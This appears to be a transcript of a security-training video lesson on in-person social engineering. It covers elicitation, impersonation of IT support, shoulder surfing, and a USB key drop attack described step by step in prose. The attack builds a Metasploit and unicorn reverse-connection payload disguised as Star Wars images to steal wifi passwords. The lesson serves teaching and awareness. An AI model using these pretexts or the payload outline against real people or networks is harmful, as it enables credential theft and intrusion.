Skill Level Intermediate
- The social engineering attacks that we've discussed so far all depend on technical aspects. In other words, we've looked at ways that we can send messages to and contact people using technical means. But there's another whole aspect to social engineering in which you're actually closer to the person and sometimes actually in person with the potential victim. So let's talk about some of the different types of social engineering attacks that you can carry out when you're in closer proximity.
Elicitation is one type of an attack or one type of a pre-attack in a way and it's basically asking for information about a system or an environment or about people from authorized users. Now you can conduct elicitation remotely using email or messages or you can just talk to someone in person and the things you might want to get from an authorized user may be something simple like what is the format of your internal email addresses? Do you use first name dot last name? Or do you use last name with a first initial or whatever the format is, if you can just kind of ask somebody, you can get a lot of information about the potential email lists or internal information that you can use to compromise that system.
So you want to collect information as if you were the insider by talking to someone who is an insider or an authorized user. Also you can use interrogation. Interrogation is conducting an informal interview, generally it's informal, but you already have developed the questions you're going to ask someone to get specific responses, so you basically want to conduct a conversation or engage in a conversation that is directed towards getting more information back from the target.
And of course, one of the favorite types of in-person social engineering attacks would be impersonation. Impersonation is where you would either walk in or call someone, the potential victim and pretend to be someone of authority. The most common way to do this is to pretend to be part of IT or the support desk and in order to complete your job, you need more information to conduct that questioning. Like you may say this is tech support, you've got malware detected on your machine, give me your password and we'll clear it up for you, something like that.
Of course it needs to be more sophisticated, but that gives you an idea of what you might be able to do. If you don't want to go that route, and you also want to get more information, specifically for things like usernames and passwords, one effective mechanism is shoulder surfing. Now we did talk about getting someone's PIN if you swipe a card like at an ATM machine and you want to grab somebody's PIN, we talked about virtual shoulder surfing using a camera but you can literally stand behind somebody and watch how they type and you can see them type their password and so that's another example of shoulder surfing.
And shoulder surfing is not just for password recollection or password divulging as well, but it's also for looking at what the user is doing, perhaps the user is viewing confidential information and just by watching what their doing you can kind of gather information to which you're not privy, something that you're not authorized to view. In fact what you'll notice if you ever have an opportunity to walk into a very secure facility, such as a CIA headquarters, if you ever walk into one of the rooms where analysts are working on computers, you will have of course a badge that would identify you as a visitor and if you do not have proper clearance as you walk into that office area, all of the screens that are close around you will blank out because if you walk by, there's RFID readers that would communicate that this person that holds the badge does not have the authority to view what's on your screen right now and the screen goes blank.
It's kind of annoying if you're an analyst and all of a sudden your screen goes blank, you have to wait for somebody to walk by but that is a way of ensuring that there's no shoulder surfing going on 'cause it is a real problem. Another way that we can use in-person social engineering is it's kind of like not truly in person but you're using physical device to pass from one person to another and it's called a USB key drop. USB keys are devices that we use all the time just little USB, you pop it in the USB drive and we use it to transfer files, transfer all kinds of things and in fact you can make them auto boot so when you insert it into a new machine, if there's an auto-run feature enabled, it'll actually run whatever software's there, whether it's good software or bad software.
So it's possible that you can place weaponized USB keys in places where unsuspecting users are likely to pick 'em up. The way you do this is you put them in places where people may think, oh I found something that's valuable. We've seen USB key drops work very very well when you take a bunch of 'em and you kind of sprinkle them around a parking lot or the part of a parking lot in a large office complex where people tend to walk into the front door to go to work. If you sprinkle those around early in the morning, chances are somebody will recognize it, they'll pick it up and put it in their pocket.
First thing they do when they sit down at their desk is they go, hmm wonder what's on this guy and they'll plug it into the computer and if you have weaponized auto run functionality, then their computer will likely be compromised to that particular point or infected with whatever you put on it. It's extremely common for people to want to insert a USB key to see what's on it and that is your attack vector. So let's take a look, I ran across this really cool USB key drop attack so I want to show it to you, we're not going to go through all the steps, it's kind of a big long series of steps but it's important enough and very cool enough that I wanted to point this out and show you how a real attack may occur.
So here is a website again it's one that I ran across and it's basically how to hack WPA2 wifi passwords using Jedi mind tricks. Well the idea really is just social engineering and USB dead drop. So if you go to the URL that you see on your screen, you can read the whole article. So what this does is it takes a series of USB keys, really you only need one for it to work but you typically would buy a bunch of these and then sprinkle them around different places.
So according to the author, you can buy them all around the place for 16 gig or larger, for just a few dollars. You are going to use Metasploit to actually set up the exploit. The unicorn repository is a framework for creating payloads, creating infected payloads that you decide what happens when they automatically run and load into memory. So if you were to clone the unicorn repository you're going to be using unicorn to actually create this payload and so there's different types of payload you can use, and the one that they've chosen, excuse me, and the one that they've chosen will create a reverse UDP connection to the attacker's IP address, so basically what it does is it automatically connects the victim machine to the attacker machine.
So you save the payload, then you download some Star Wars images and icons, the idea behind this one is that when the user puts the USB key into their computer, they'll see Star Wars pictures and hopefully they'll click on one of 'em. So we'll see something like this, just pictures from Star Wars. They tell you how to convert the images to icons and then make the icons executable, B2E is an executable, it's a, turns graphics into executables, then you convert the payload to the executable using the program you just downloaded, change the file extensions, start Metasploit and at that point Metasploit is listening for the connections and then all at that point you have to do is label and drop the USB sticks and that's it.
To label and drop the USB sticks, you put them somewhere where someone is likely to pick 'em up and then you wait and all the victim has to do is insert that USB stick into their computer, the auto load program will load, create a connection back to your machine and what it'll do, it'll dump their wifi passwords onto your machine and that is a very convenient way for you to steal wifi passwords using a USB key drop.
So why is it that social engineering attacks work so well? They seem to be fairly easy and there's so many different types out there and the reason they work so well is because they depend on the overall innate goodness of people. So a good social engineering attack should contain as many of the motivation aspects as possible, including authority, scarcity, social proof, urgency, likeness and fear.
So now, think about the last phishing email you received, it probably contained a lot of these. Authority, it probably came from someone with authority, perhaps a Nigerian prince, but somebody that has some authority maybe it's an FBI agent, a CIA agent or somebody that supposedly has more power than you do. Scarcity, the idea behind most social engineering attacks is there's something that is needed that only you have and it's valuable.
Social proof, there's typically back and forth to prove that yes there's value to what I am providing to you or what I'm asking you for and value for what you have and it's important, urgency means you've got to do this really fast, if you wait, the window will pass and something bad will likely happen. Likeness, most phishing attacks and any type of social engineering attack tries to develop some sort of rapport so that you feel comfortable and it's not like there's a stranger asking you for anything.
And lastly, kind of in contradiction to the likeness and developing a rapport is fear. That along, that goes along with urgency, if you don't do this right now for me something bad will happen to me or to you. So those are many of the motivation techniques that are used in social engineering and you'll find them present in most social engineering attacks. But the bottom line is, people want to be accepted and they want to be valued by others, so when an attacker reaches out and kind of strokes that desire, it provides a very high probability that at least one of the victims will respond in the way that the attacker really wants.